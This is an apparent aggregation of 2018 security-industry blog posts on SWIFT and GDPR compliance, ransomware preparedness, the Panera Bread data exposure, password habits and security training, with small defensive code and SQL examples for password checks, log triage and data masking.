SWIFT urges its members to minimize the occurrence of known technical vulnerabilities within the local SWIFT infrastructure by ensuring vendor support, applying mandatory software updates, and applying timely security updates aligned to the assessed risk.

Organizations wishing to follow this requirement can do so by setting up a system that supports vulnerability assessments for databases in the SWIFT environment. This way members can ensure that the most recent security updates are installed on the operating system and the database.

Password Policy

According to the CSP, members must ensure passwords are sufficiently resistant against common password attacks by implementing and enforcing an effective password policy.

It's important that the password policy is applied consistently across all the applications in an organization's SWIFT infrastructure. As a best practice, many organizations use security solutions to help ensure the policy is followed, actively scanning to identify and alert on policy violations such as the use of weak passwords that could compromise the security of the network.
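
As a toy illustration of such scanning, the check below vets a candidate password against a small denylist and basic complexity rules; the denylist and thresholds are assumptions for the sketch, not SWIFT requirements:

```python
import re

COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein"}  # tiny denylist

def violates_policy(password: str) -> list:
    problems = []
    if password.lower() in COMMON_PASSWORDS:
        problems.append("appears on common-password denylist")
    if len(password) < 12:
        problems.append("shorter than 12 characters")
    if not re.search(r"[A-Z]", password) or not re.search(r"\d", password):
        problems.append("missing an uppercase letter or a digit")
    return problems

print(violates_policy("letmein"))  # flagged on all three rules
```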

Logical Access Control

SWIFT requires members to enforce the security principles of need-to-know access, least privilege, and segregation of duties for operator accounts.

To meet this requirement, organizations can often use capabilities built into their software to establish user roles and access control lists. However, this too should be continuously monitored for compliance, which is best done by deploying a security solution that detects and alerts on attempts to breach system privileges.

Logging and Monitoring

All members of the SWIFT network must utilize a logging system that is able to record activity such as system logins, user IDs, network IPs, messages sent, message recipients, transaction details, and other information – then establish procedures to continuously monitor the system.

Many organizations lack the resources and skills to effectively analyze real-time events or to search through massive amounts of log data and identify which entries might indicate a threat or breach. Security monitoring tools can help automate the process using machine learning and artificial intelligence, filtering out “noise” while quickly identifying events that could indicate a serious risk, then sending immediate notification or stopping the activity.
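
A toy event filter in this spirit is sketched below: it passes over routine noise and surfaces entries matching high-risk rules. The field names, BIC codes and rules are illustrative; real tools use models tuned to each environment:

```python
KNOWN_COUNTERPARTIES = {"BANKUS33", "BANKNL2A"}  # hypothetical BICs

# High-risk rules; anything that matches none of them is treated as noise.
HIGH_RISK = [
    lambda e: e.get("event") == "login_failed" and e.get("count", 0) > 10,
    lambda e: (e.get("event") == "message_sent"
               and e.get("recipient_bic") not in KNOWN_COUNTERPARTIES),
]

def triage(events):
    for e in events:
        if any(rule(e) for rule in HIGH_RISK):
            yield e  # forward to an analyst, or block in real time

events = [
    {"event": "login_failed", "user": "ops1", "count": 14},
    {"event": "message_sent", "recipient_bic": "BANKNL2A"},
]
for alert in triage(events):
    print("ALERT:", alert)  # only the brute-force burst surfaces
```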

Cyber Incident Response Planning

To adhere to the CSP terms, members are required to activate a consistent and effective approach for the management of cyber incidents.

This is a procedural requirement whose ongoing management can be time-consuming and costly. Organizations can greatly simplify the process and reduce costs by using solutions that automate it: monitoring activity by policy; identifying, detecting and alerting on risks; and helping stop potential breaches in real time.

Shortening the SWIFT Compliance Process

Organizations and institutions wanting to ensure their place on the SWIFT white list can use third-party solutions to simplify SWIFT CSP compliance. Imperva provides solutions that will lighten the load, saving the organization precious time and effort.

Imperva SecureSphere provides a unified security platform that monitors and protects applications, data flows and databases. SecureSphere provides options for a Web Application Firewall (WAF), Database Vulnerability Assessment and Monitoring, and a Database Firewall (DBF).

A combination of SecureSphere and CounterBreach, Imperva’s behavioral analytics solution that detects risky data access behaviors, will provide maximized security for financial institutions seeking compliance for inclusion in the SWIFT network.

Less Than 30 Percent of IT Security Executives Can Prevent Ransomware Attacks, Survey Reveals

Less than 30 percent of IT security executives who responded to a recent survey reported that they would be able to prevent large-scale ransomware attacks.

Despite this, SolarWinds MSP’s new report, “The 2017 Cyberattack Storm Aftermath,” found that IT security executives have a high level of knowledge of crypto-malware. More than two-thirds (69 percent) of respondents said they were deeply familiar with ransomware attacks such as WannaCry, which infected hundreds of thousands of endpoints within 48 hours in May 2017, and Petya, which affected systems in dozens of countries in June 2017.

This familiarity led approximately three-quarters of survey participants to rate the risk of both WannaCry and Petya as very high, but it didn’t translate to better protection against this type of incident. While most respondents indicated that they would be able to detect WannaCry (72 percent) and Petya (67 percent), only 28 percent and 29 percent, respectively, said they would be able to prevent these attacks.

Organizations Struggle to Curb Ransomware Attacks

For the survey, SolarWinds MSP commissioned the Ponemon Institute to speak to 202 senior-level IT security executives in the U.S. and U.K. about some of the most high-profile threats that emerged in 2017. Their responses revealed that enterprises could be doing more to protect against these widespread attacks.

For example, just one-quarter of respondents said their organization employs specialists who possess the necessary expertise to defend against ransomware and other threats. Meanwhile, one-third admitted that their employer doesn’t have any specialized personnel on the payroll and doesn’t consult with external experts.

Many of these problems can be attributed to lack of resources. Less than half of survey participants reported having sufficient technology to prevent, detect and contain significant threats, and 48 percent said their organization’s IT security budget was inadequate.

Patching and Basic Security Hygiene

Tim Brown, vice president of security architecture at SolarWinds, said the best way for organizations to close these gaps and protect themselves against ransomware is to apply software patches.

“People often don’t think of basic security hygiene as one of the most important things they need to do, but it really is — although it’s really not easy,” Brown told Infosecurity Magazine. “Doing the basics well is not ‘sexy’ or ‘cool,’ it’s a lot of hard work that needs to get done, but no technology is going to really save you from that hard work.”

For companies that lack the necessary resources to fulfill those security basics, Brown suggested contracting security functions to a managed services provider (MSP).

The post Less Than 30 Percent of IT Security Executives Can Prevent Ransomware Attacks, Survey Reveals appeared first on Security Intelligence.

Panera Bread’s half-baked security

We’ve heard it all before. XYZ Company “takes your data security very seriously.”

Most commonly you’ll hear these words just after a company has suffered an embarrassing data breach, perhaps having carelessly exposed the personal information of innocent customers onto the net or had a database stolen by hackers.

The truth is that it’s a brave organisation which promises it will never suffer a serious security incident. Accidents can happen; human weaknesses can leave open vulnerabilities which hackers may be able to exploit; and partners who work alongside your company may have had their own security failure which impacted your business.

In these instances, the only way to recover your customers’ trust and retrieve your company’s reputation from being tarnished too much is to respond appropriately to the incident. Often, in fact, the response to a security breach will be more critical to your company’s brand than the incident itself.

And, if you want an example of a company that has got it massively wrong look no further than Panera Bread, the North American chain of over 2000 bakery cafés.

If you visit Panera Bread’s website today, you won’t find the usual collection of sandwiches, soups, salads, and sausage rolls. Instead, you’ll probably see a maintenance notice.

Panera Bread’s website is down. In fact, it’s the second time it’s been down in the last couple of days. Let me explain why…

In August 2017, a security researcher called Dylan Houlihan privately informed Panera Bread of a serious security vulnerability on the delivery.panerabread.com website, which meant that details of any signed-up customers’ full names, email addresses, phone numbers, and the last four digits of their saved credit card numbers could be scooped up.

A member of Panera Bread’s information security team responded to Houlihan, seemingly skeptical of the report – believing it to be a scammy sales pitch.

After a few days and some to-and-fro (which you can read on Houlihan’s blog post), Panera Bread confirmed it was working on resolving the issue.

That was back in August 2017.

As each month passes, Houlihan investigates whether the Panera Bread security vulnerability still exists – and, sadly, it does.

And so, eight months later and frustrated by the lack of response, he informs security blogger Brian Krebs, who publicly reveals that millions of customer records are at risk.

Before publishing details of the problem, Krebs spoke to Panera Bread’s CIO John Meister, and the website was soon afterwards briefly taken down for “essential system maintenance”.

Krebs, no doubt, assumed that the problem was being resolved. But no explanation was made as to why no fix was put in place back in August 2017, when they were first informed of the problem by Houlihan.

And if you think that’s bad, things get worse…

Panera Bread told Fox News that “fewer than 10,000 consumers have been potentially affected by this issue” and that “this issue is resolved”.

However, within minutes of that claim it became apparent that the same vulnerability was *still* present on the website – and that the number of customer records exposed may total over 37 million.

And that’s why Panera Bread’s website is down again.

Let’s hope it is taking data security seriously now. Although wouldn’t it have been much better if the company had taken decisive action when the issue was first reported to them eight months ago?

‘Tiger’ Named the Most Common Password Related to a Sports Team

Security researchers recently claimed that “Tiger” is the most common password relating to sports teams and mascots.

To coincide with the annual NCAA Division I men’s basketball tournament, Keeper Security published a bracket of some of the most commonly used sports-related passwords. Among them, “Tiger” and its variations, such as “T1ger” and “T1g3r,” came out on top.

What’s the Most Common Password Related to Sports?

According to a press release, “Tiger” was 850 percent more common than “Bluejay,” the password that appeared least frequently. It was also 187 percent more common than “Eagle,” the runner-up for first place.

Some of the other credentials that appeared in Keeper Security’s bracket were “Bulldog,” “Gator,” “Cardinal,” “Wildcat” and “Hurricane.”

Keeper Security's bracket for sports-themed passwords that are commonly leaked
Source: Keeper Security

To create this bracket, Keeper Security used a file of compromised credentials uncovered by security firm 4iQ that included 1.4 billion passwords, according to a 4iQ blog post. All of these credentials were in cleartext, meaning that anyone could easily access them.

A Call for Better Account Security

Darren Guccione, CEO and co-founder of Keeper Security, said his company’s bracket reflects the fact that users continue to opt for convenience over security when choosing a password.

“People often choose their passwords based on something they can easily remember,” explained Guccione. “But those are the easiest passwords for hackers to crack. Since most people reuse the same password more than 80 percent of the time, this can compromise consumers’ banking, retail and social media accounts.”

Attackers don’t even need to steal those credentials from improperly secured databases or buy them from underground marketplaces. They can simply brute-force their way into users’ accounts by building and deploying a password cracking tool.

While Keeper’s password bracket is all in good fun, it also illustrates the need for users to embrace better account security practices. They can do so by adopting authentication solutions such as biometrics and by following the recommendations of enterprise security teams. Most will advise users to avoid simple keystroke combinations, stay away from common dictionary words and create unique passwords for each account.

The post ‘Tiger’ Named the Most Common Password Related to a Sports Team appeared first on Security Intelligence.

Emerging Trends in Information Technology: Focus Shifts to Device Disposal as Hardware Spending Increases

Company spending on hardware is trending up. That’s the word from a recent Spiceworks survey that analyzed emerging trends in information technology. According to the report, 44 percent of businesses expect to boost IT budgets through 2018, with 31 percent of funds allocated for new hardware.

Study Examines Emerging Trends in Information Technology

The Spiceworks study found that enterprises are spending more on desktops, laptops, servers and networking hardware. End of life (54 percent) and increased growth (53 percent) drive the bulk of these new hardware purchases. This is a marked departure from recent years, which saw both shrinking IT departments and trends toward rented resource consumption over physical investment.

But as end-user expectations increase and mobile devices become essential to business’ bottom lines, companies can’t put off hardware purchasing until it’s more convenient — spending is a requirement to stay competitive. According to Network World, double-digit growth is in the cards for hardware purchasing this year, with investment firm Morgan Stanley upgrading its view of the market from “cautious” to “attractive.”

More Endpoints, More Problems

More hardware means more endpoints and, ideally, improved corporate efficacy. It also drives increased risk since network devices, desktops and laptops leverage technology that may be susceptible to threats.

While emerging trends in information technology still include a focus on securing applications and detecting software threats, there’s also a need to securely handle and dispose of old hardware. Simply tossing or recycling old devices creates a potential attack avenue for cybercriminals. Individuals who manage to get their hands on decommissioned hardware that hasn’t been properly severed from corporate networks could initiate a breach that would seemingly originate from approved devices.

There’s also the problem of existing structure. Malicious actors with the ability and time to examine ditched devices could uncover common hardware components that are vulnerable to well-known threats and then apply this knowledge to corporate infrastructures at large.

Properly Disposing of Old Hardware

According to TechRepublic, companies “must standardize their procedures for decommissioning and disposing of old IT hardware as part of their comprehensive data security protocol.” Tossing hardware isn’t fire-and-forget — devices must be properly disconnected, wiped for critical data, and then securely recycled or disposed of in a way that prohibits reconstruction and information mining.

With IT budgets on the rise and new hardware atop the spending list, enterprises must secure devices as they’re deployed, while they’re in use and during decommission.

The post Emerging Trends in Information Technology: Focus Shifts to Device Disposal as Hardware Spending Increases appeared first on Security Intelligence.

Know Your Security X’s and O’s: Your Cyberdefense Team Is Only as Good as Its Threat Intelligence

All of us in the security industry realize that we face a virtually insurmountable task to ensure that the data belonging to our organizations and customers is kept safe and secure. If you step back and think about it, the list of potential perpetrators is daunting in scope. It includes cybercriminals, hacktivists, foreign governments, and both malicious and negligent insiders. Not only are they persistent, but they also work together like a well-oiled college basketball team determined to cut down the nets — except cybercriminals are working toward the singular goal of gaining illegal access to data.

Threat Intelligence: The X’s and O’s of Security

The tools cybercriminals use to achieve this goal vary, but they are all designed to exploit weaknesses, both human and technological, and defeat or disrupt the many layers organizations put in place to protect their critical assets. It’s the ultimate game of cyber cat and mouse in which the opponents deploy cunning techniques to trick innocent bystanders into letting their guard down. Investment in robust, cutting-edge security systems and thorough training are crucial to prevent such activity.

Of course, the security teams we have in place to protect our digital information deserve a lot of credit for applying their know-how and skills to use advanced capabilities such as artificial intelligence (AI)-powered network monitoring and timely threat intelligence. If you stop and think about it, threat data really is a make-or-break part of the security playbook. Many people either take it for granted or just assume it’s something to toss into the mix and forget about. Few realize how threat intelligence can empower an organization’s security team.

Cyberdefense Is a Team Sport

The Ponemon Institute’s “2017 Cost of Data Breach Study” supported this premise, noting that the time it takes to identify and contain a data breach has been reduced due to “investments in such enabling security technologies as security analytics, SIEM, enterprisewide encryption and threat intelligence sharing platforms.”

When your security systems have the most current intelligence, your analysts can make educated decisions with detailed information. Like a basketball team seamlessly working together on the court, you and your security team can use threat intelligence to get ahead in the big game of cyberdefense.

So what does this mean for your organization? Are you ready to cut down the nets, so to speak? To gear up, make sure you’re taking advantage of the IBM X-Force Exchange to strengthen your defenses. By collecting and sharing threat intelligence, you can create the best playbook to help your security team research threats, collaborate with peers, and take swift and coordinated action to protect corporate and customer data.

Visit the X-Force Exchange and start sharing threat intelligence

The post Know Your Security X’s and O’s: Your Cyberdefense Team Is Only as Good as Its Threat Intelligence appeared first on Security Intelligence.

Why IT Compliance Is Critical for Cyber Security

IT compliance is sort of like the forgotten stepchild of cyber security. It doesn’t get as much attention as data breach prevention technologies and policies, even though it is equally

The post Why IT Compliance Is Critical for Cyber Security appeared first on The Cyber Security Place.

Five Surprising Reasons to Invest in Better Security Training

The conventional wisdom about security training needs an update — and for reasons that may surprise you.

Cyberattacks are rising in frequency, severity and the damage they cause. Since the weakest link in any networked chain is the user, employee training is a vital part of a comprehensive program that also requires world-class software and savvy policy.

You know all that, but there are other, less obvious reasons to invest in better training that even the most grizzled IT security veteran may not fully appreciate.

Surge of Insider Attacks Suggests Need for Better Security Education

The 2017 IBM X-Force Threat Intelligence Index report showed that a shocking number of incidents come from insiders, employees and other trusted people. Seventy-one percent of attacks against healthcare companies fall into this category, while 58 percent of incidents in financial services, the most-attacked sector, originate from insiders.

The majority of these insiders are inadvertent actors — mostly employees who were tricked into initiating the attacks. These numbers expose the inadequacy of today’s normal training programs. They’re not frequent, memorable or thorough enough. In other words, they’re not working.

The bottom line is that training has not kept up with the evolution of cyberthreats or their remedies. That’s why it’s more important than ever to implement the best possible tools to protect sensitive data. But decision-makers must remember that even the best software cannot stop all threats.

For example, any employee with access to any phone anywhere at any time is potentially vulnerable to social engineering. The reality of bring-your-own-device (BYOD) environments is that employees may be connecting to company resources at all hours and exposing their devices to threats in arbitrary locations and over insecure networks. That’s why great software and solid policies must be accompanied by more frequent and better training.

Five Reasons Why Improved Training Is Vital to Data Security

Of course, training exists to educate employees about threats. Don’t click on that suspicious email link. Don’t insert that thumb drive you found in the parking lot. Don’t keep your password on a note card stuck to your monitor.

But security training should be about far more than just teaching employees to avoid common errors. Below are five surprising reasons why training is vital.

1. Morale

Accelerating threats affect employees most directly by causing unwanted changes in how they work. Security rules implemented without follow-up can feel like an imposed burden. Good training makes employees feel like partners in these policy changes.

2. Speed to Remedy

Better training enables employees to more effectively spot and report suspicious activity. Confusion causes paralysis, but education promotes action. That means faster average resolution times and better institutional learning.

3. Self-Policing

Most threats come from the inside, not the outside. When employees know where threats come from, they’re in a better position to help each other avoid unwitting participation in a breach — and to report deliberate participation.

4. Compliance

Rising security threats have ushered in a new era of regulation. That means decisions around security and privacy come with more regulatory and legal ramifications than ever before. It also makes everything more complicated. There’s simply more to learn now, and that demands more and better training. The burden of compliance can also change institutional thinking and lead to a harmful compliance-first mindset. Training helps employees comply with regulations without taking the focus off actual, practical security.

5. Informed Purchase Decision-Making

The most important internal group to train is also the hardest: C-level executives, managers and team leaders. One of the biggest institutional problems around security is the failure to invest in the best solutions. This is often a direct result of top decision-makers’ lack of knowledge. Training that exposes leaders to the risks of today’s increasingly damaging breaches — and the rewards of being ready for them — can be very effective.

It’s Time to Get Creative With Security Training

Cybercrime is being industrialized, automated and optimized using big data analytics and artificial intelligence (AI). Much of that AI is applied to the social engineering of employees. Annual go-through-the-motions training won’t cut it anymore. It’s time to be proactive and get creative.

Don’t think of training as something that happens only at scheduled sessions. It must be constant and continuous. For example, security leaders can create fake malware or phishing attacks. When employees click or open them, serve up a quick training on why they just made a huge error and what to do if this happens again. Security teams might also consider publishing a newsletter or internal podcast to raise security awareness throughout the organization.

As threats evolve and grow more complex and damaging, it’s imperative to rethink how the organization as a whole learns and grows. By educating employees about how cyberthreats affect them, their data and their jobs, IT leaders can make security personal and steer the organizational culture toward security consciousness.

Listen to the podcast series: Take back control of your cybersecurity now

The post Five Surprising Reasons to Invest in Better Security Training appeared first on Security Intelligence.

Steps to Take to Beat the Insider Threat in 2018

Hackers get the headlines, but a data breach is more likely to originate inside your own office walls. Errors, negligence and malicious intent by employees are the leading causes of

The post Steps to Take to Beat the Insider Threat in 2018 appeared first on The Cyber Security Place.

Government Leaders Rank Cybersecurity Threats as Top Trend Affecting Communications, Survey Reveals

Cybersecurity threats constitute the top trend affecting government communications, a recent survey of local councils and leaders revealed.

In Vision’s 2018 research brief titled “What’s Next in Digital Communications for Local Government,” more than one-quarter (27 percent) ranked cybersecurity threats as the top factor influencing how their government communicates and operates. Citizen engagement ranked slightly lower among survey participants at 24 percent, followed by social media at 13 percent.

Cybersecurity Is Top of Mind for Government Leaders

These concerns help explain why security is at the top of respondents’ minds for 2018: 41 percent of surveyed parties told Vision, a service that builds, develops and hosts websites for local governments, that minimizing cybersecurity risk is among their top priorities for the year, behind only expanding citizen engagement (66 percent), and improving web accessibility and adherence to Web Content Accessibility Guidelines (WCAG) 2.0 (53 percent).

David Nachman, general manager of content management solutions for Vision, said these considerations among local government leaders reflect the concerns of their constituents.

“It’s clear that local agencies are well aware of the rising expectations of their increasingly digital and mobile citizens who now demand the same level of accessibility, security and efficiency they enjoy in the private sector,” Nachman wrote in an article on GCN.

Cybersecurity Threats: A Persistent Problem

The Vision report underscored persistent cybersecurity challenges confronting governments. According to Netwrix’s “2017 IT Risks Report,” 65 percent of governments said they suffered a breach in 2016. Only 26 percent said they felt prepared to defend their data against cyberthreats.

At the same time, nearly half of government employees that responded to a recent Dtex survey said they take no responsibility for cybersecurity. Even worse, one-third of participants said they believe they are more likely to be struck by lightning than to suffer a data breach.

To address these ongoing issues, Dtex advised governments to adopt a layered approach to cyberdefense that consists of building a positive security culture in the workplace and using intelligent, automated data protection tools.

The post Government Leaders Rank Cybersecurity Threats as Top Trend Affecting Communications, Survey Reveals appeared first on Security Intelligence.

Failure to Communicate Critical Data Risk to Business Leaders Can Have Perilous Consequences

Greater cybercriminal sophistication, regulations and customer privacy expectations are ushering in a new era of data security accountability. Critical data and information — including customer information, intellectual property and strategic plans — are key to organizations’ competitiveness, but a breach of this data can have disastrous consequences.

Business leaders must play an active role in protecting against the risks associated with breaches of critical business data and intellectual property. But IT, security and risk teams speak a different language from business leaders and often struggle to equip them with the information they need to make effective decisions. Tools that give executives business-relevant data security visibility can help bridge the divide.

Who Is Accountable for Data Security?

Though data security has long been the purview of IT and security teams, the market is shifting, and business executives must take notice. IBM commissioned Forrester Consulting to survey 150 IT, security and risk decision-makers to examine their approach to protecting their company’s critical information and communicating data risk to senior business executives.

The Forrester report, “Is Your Company in Peril If Critical Data Is Breached?,” found that CEOs and boards of directors are most accountable to external stakeholders when data is compromised. It’s no longer optional: Business leaders must play an active role in protecting their company’s critical data assets. As recent, highly publicized breaches have demonstrated, their firm’s reputation and stock price, as well as their jobs, are at stake.

Forrester Infographic: The Data Risk Imperative (Source: Forrester Research; © 2018 Forrester Research, Inc. All rights reserved.)

Read the complete Forrester Report: Is Your Company In Peril If Critical Data Is Breached?

Opportunities and Threats Are Intertwined

With the opportunity to use data to improve business operations and customer experiences comes the threat of data compromise and loss. But before IT and business executives can take on their data security responsibilities, they must first identify their company’s critical assets — the ones that are key to the organization’s success and would pose considerable risk if compromised.

Over 70 percent of IT and security professionals believe it’s important for business executives to have visibility into a long list of data security metrics, yet IT and security professionals themselves struggle to distinguish between tactical, operational and strategic security priorities.

However, it is imperative that they are able to communicate these very priorities to business leaders, who often lack security expertise, in a language they understand. While it may be tempting to develop a long list of metrics for everyone, security information needs to be explained in a context that the intended audience can relate to and comprehend.

Investing in Security Controls to Protect Critical Data

Seventy-nine percent of respondents to the Forrester study said they feel they can justify the business case for a centralized, business-friendly command center with these capabilities. To help avoid disastrous consequences, including incident response costs, regulatory fines, plummeting stock prices and shattered reputations, a data risk management program is critical.

Investing now in data security controls that align IT, security and the business can help prevent costly breaches down the road and ensure that key stakeholders come together to help execute the company’s security strategy.

To learn more, join our webcast, “Bridging the Data Risk Divide,” on April 9, featuring guest speakers Heidi Shey, senior analyst serving security and risk for Forrester, and Daniel Goodes, worldwide data security technical leader at IBM. They will discuss recent Forrester research surrounding data risk management.

Register for the April 9 Webinar: Bridging the Data Risk Divide

The post Failure to Communicate Critical Data Risk to Business Leaders Can Have Perilous Consequences appeared first on Security Intelligence.

Compliance functions make a turn towards innovation-fueled strategies

Faced with growing threats of ‘industry shocks’ such as cyber fraud, cryptocurrency, quantum computing and open banking, financial institutions expect to increase their compliance investments over the next two years as they seek new approaches to strengthening compliance capabilities, according to a new report from Accenture. Based on a survey of 150 compliance executives at financial services institutions, Accenture’s fifth annual compliance risk report, “Comply and Demand,” found that 89 percent of … More

The post Compliance functions make a turn towards innovation-fueled strategies appeared first on Help Net Security.

A Letter From the Future: It’s January 2019 and Hackers Are Stealing Your Data

This article was published on LinkedIn on March 27, 2018. You can read the original post here.

In my first LinkedIn article, I’d like to welcome you to the future. Not too far into the future. But, it’s January 2019 and unfortunately cyber criminals are stealing your data. You’re scrambling to respond, hustling to contain, scurrying to an emergency board meeting. It’s a bad day.

You may be thinking that this isn’t going to happen to you, but many recent headlines say otherwise. So this is my humble letter that I wish I had gotten to you 10 months ago. Today.

From my chair, running IBM’s cybersecurity unit, I get to see things that don’t even make it to the news. Yesterday, we actually helped check references on a hacker for a customer wondering if they should pay bitcoin to get their servers back. This morning, my research team in Israel uncovered a new organized criminal ring developing a method to steal money from banks in Brazil. And just in the last 24 hours, my threat intelligence team received indicators of 30 new domains registered by hackers as command and control servers for their malware.

But here’s the thing…even though cybercrime is becoming significantly more sophisticated, there are things we can do that can make a difference. Here are my current top three:

1. Prepare Your Response.

My first advice is that “response” isn’t something that should be considered after a breach is detected, but rather something that needs to be planned and rehearsed way ahead of time.

An effective response to a cyber incident requires preparation and planning — a playbook — as well as training and rehearsing, in the same way hospitals prepare for emergencies. As we’ve seen with recent cyberattacks, often a company’s response can do more damage than the breach.

Last year IBM opened the world’s first “cyber range” for the private sector — a place where clients come for rigorous training to prepare for a potential cyberattack. It’s been an eye-opener for us and the 1,400-plus people who have trained there.

Our big takeaway is that this isn’t just a technical team problem — the response needs to span every function in your organization. An effective response plan includes not just the security team’s role in detecting and remediating a breach, but how your organization reacts to regulators, your Board of Directors, law enforcement, clients, employees, the media and other constituents.

Such training and rehearsing helps organizations develop and regularly update a highly detailed and coordinated response plan, and build “muscle memory” that can be thrown into action when a breach occurs.

Most organizations don’t have this. A study we released this week shows nearly 80 percent of organizations surveyed said they cannot remain resilient after a cyberattack due to a lack of planning. And the longer it takes to respond, the higher the costs. For example, a breach contained in less than 30 days saves an organization, on average, nearly $1 million.

2. Change the Game With AI.

AI can ingest, comprehend and analyze the enormous amount of security data that’s out there today, in whatever form it takes, and it can be deployed quickly. It will help you detect and respond to cyberattacks at speed and scale. More than that, cognitive systems make correlations that provide insight to detect potential breaches much faster than humans alone.

AI will give your security analysts much needed help in finding the needle in the haystack so they can concentrate on stopping the attack.

AI in the form of machine learning enables you to do things like determine if an employee’s identity has been compromised by deeply understanding user behavior and detecting anomalies that could indicate an insider threat. Machine learning can automatically scan new applications for vulnerabilities so developers can continue to move quickly, confident that their app is secure. And when it comes to mobile, AI can see what’s going on at the endpoint and dynamically make recommendations on policies, patches and relevant best practices to keep devices secure.
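
To make that concrete, here is a minimal sketch of the baseline-and-deviation logic such systems build on, written as a PostgreSQL query over a hypothetical access_log table (the table and its user_id, day and rows_read columns are illustrative names; real machine learning products model far richer behavior than a simple three-sigma rule):

  -- Flag users whose data-access volume today deviates sharply from their own history
  WITH baseline AS (
      SELECT user_id,
             avg(rows_read)    AS mu,     -- each user's normal daily volume
             stddev(rows_read) AS sigma
      FROM access_log
      WHERE day < current_date
      GROUP BY user_id
  )
  SELECT a.user_id, a.rows_read
  FROM access_log a
  JOIN baseline b USING (user_id)
  WHERE a.day = current_date
    AND b.sigma > 0
    AND a.rows_read > b.mu + 3 * b.sigma;  -- reading far more than usual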

3. Master the Basics.

Good security hygiene — from keeping software patches updated to scanning applications for vulnerabilities — still counts, maybe more than ever. And from where I sit, not enough companies are focusing on the mundane, hard work of getting the basics right — 100 percent of the time. Any less than that will leave you open to an attack.

Think about cyber security the same way that an engineering or manufacturing company thinks about safety and quality. An auto manufacturer would never accept just a few defective parts leaving the plant. An oil company would not be satisfied losing five percent of its drilling rigs. You should not be satisfied with anything less than perfect either. Drive that into your culture.

I’m not saying these so-called basics are easy to get right. I know your teams are challenged with an enormous — and growing — amount of security data. Whether it’s the potentially 200,000 security events you see every day or the 60,000 security blogs your analysts need to read each month, all of it needs to be analyzed quickly to find anomalies that may indicate a pending cyberattack. And the significant skills shortage we’re facing in cybersecurity, with an estimated 1.5 to 2 million unfilled security jobs by the end of this decade, is making it even more difficult.

But at the end of the day, this quality control is worth the effort. Mastering these basics from the outset will allow you to react more quickly in the wake of an attack — potentially saving millions of dollars and significant damage to your reputation. Not only that, it will also help close the gaps so that you’re dealing with fewer of these incidents in the first place.

To wrap up, cybercrime is one of our generation’s most significant issues, equally impacting the public and private sector, as well as consumers and citizens. The basics matter, how you handle an attack makes all the difference in the world, and with AI we have a fighting chance to get ahead of the criminals.

The post A Letter From the Future: It’s January 2019 and Hackers Are Stealing Your Data appeared first on Security Intelligence.

Qualys integrates with Google Cloud Platform’s Security Command Centre

Qualys and Google Cloud Platform can now play nicely together with the launch of the security firm’s Cloud Security Command Center (Cloud SCC) integration. The security and data risk platform will

The post Qualys integrates with Google Cloud Platform’s Security Command Centre appeared first on The Cyber Security Place.

Insurance and Corporate Vigilance Against Cyber Breaches: 5 Steps to Take in the Absence of Cross-Industry Protocols

Despite the lack of bright-line procedures, there are five risk reduction measures a company may consider implementing to reduce its potential exposure to cyber breaches, strengthen its security protocols, and

The post Insurance and Corporate Vigilance Against Cyber Breaches: 5 Steps to Take in the Absence of Cross-Industry Protocols appeared first on The Cyber Security Place.

Data Security Solutions for GDPR Compliance

Enforcement of the new EU General Data Protection Regulation (GDPR), adopted in 2016, starts on May 25, 2018. It requires all organizations that do any business in the EU or that collect or process personal data originating in the EU to comply with the regulation. Organizations that do not have a physical office in the region or do not process personal data in an EU member country are not exempt from the GDPR. Those that fail to comply can face very strict fines—as much as €20 million (about $22.3 million) or up to four percent of total worldwide revenue for the preceding financial year, whichever is higher.

Key articles that pertain to data security (Figure 1) are summarized below from the lengthy 88-page GDPR document:

  • Article 25: Data protection by design and by default
  • Article 32: Security of processing
  • Article 33: Notification of data breaches to the appropriate regulator
  • Article 35: Data protection impact assessment
  • Article 44: General principle for data transfer

We’ve previously written about the professional services we offer that assist with GDPR compliance. In this post, we discuss our products in more detail and how they map to the GDPR data security-specific articles above. Here are five ways Imperva data security solutions can help organizations meet GDPR compliance requirements.

Mapping GDPR data security requirements to Imperva solutions

Figure 1: Mapping of key GDPR data protection requirements to Imperva data security solutions

Data Discovery and Classification

GDPR requires that organizations create and maintain a detailed inventory of personal data, and then classify that data by assigning a risk profile and priority. To achieve this, the first step is to understand where databases are located and what type of information they hold. Imperva SecureSphere finds both known and unknown databases by automatically scanning enterprise networks. You can easily create custom data discovery policies to scan any part of your network. To ensure new data is continuously discovered and brought into security and protection efforts, SecureSphere enables automated, scheduled scans, allowing you to develop and maintain an up-to-date inventory of data scattered across your organization.
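
As a rough, non-product illustration of the classification step within a single PostgreSQL database, a catalog query can surface columns whose names suggest personal data (the name pattern is purely illustrative, and this is no substitute for network-wide discovery of unknown database instances):

  -- Find likely-sensitive columns by name across all user schemas
  SELECT table_schema, table_name, column_name, data_type
  FROM information_schema.columns
  WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
    AND column_name ~* '(ssn|social|credit|card|passport|birth|salary)';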

Masking or Pseudonymizing Personal Data

The GDPR requires organizations practice data minimization and purpose limitation. This means they collect and use data limited to only what is necessary for a specific purpose, retain it no longer than necessary and limit access to a need-to-know basis. As an example, if an insurance company collects personal information for the purposes of issuing a policy, they cannot use that data for pricing analysis because the personal data collected for one purpose (e.g., issuing a policy) cannot be used for a new purpose (e.g., creating a database for pricing analysis). However, if the data is pseudonymized via data masking, then they could use the masked data for pricing analysis, which is beyond the original collection purpose.

Pseudonymized data, according to the GDPR, is data that has been de-identified such that the data cannot directly identify the subject. Imperva Camouflage obfuscates personal data through data masking that replaces real data with realistic fictional data that is functionally and statistically accurate. It reduces risk of data breach while enabling data utility for business needs.
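
For illustration only, a minimal static-masking pass over a hypothetical non-production table might look like the sketch below (the policyholders table and its columns are invented, and id is assumed to be an integer key; Imperva Camouflage additionally keeps masked values functionally and statistically consistent, which this naive version does not):

  -- Replace real identifiers with realistic but fictional values on a non-production copy
  UPDATE policyholders
  SET ssn       = lpad(floor(random() * 1e9)::bigint::text, 9, '0'),
      full_name = 'Customer ' || id,
      email     = 'customer' || id || '@example.com';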

Security of Processing

Making sure that personal data is secure is the cornerstone of the GDPR. It states that those handling data, such as data controllers and data processors, need to introduce appropriate technical and organizational measures to secure the data. SecureSphere helps you protect data by identifying database vulnerabilities and monitoring database activity.

Database Vulnerability Assessments

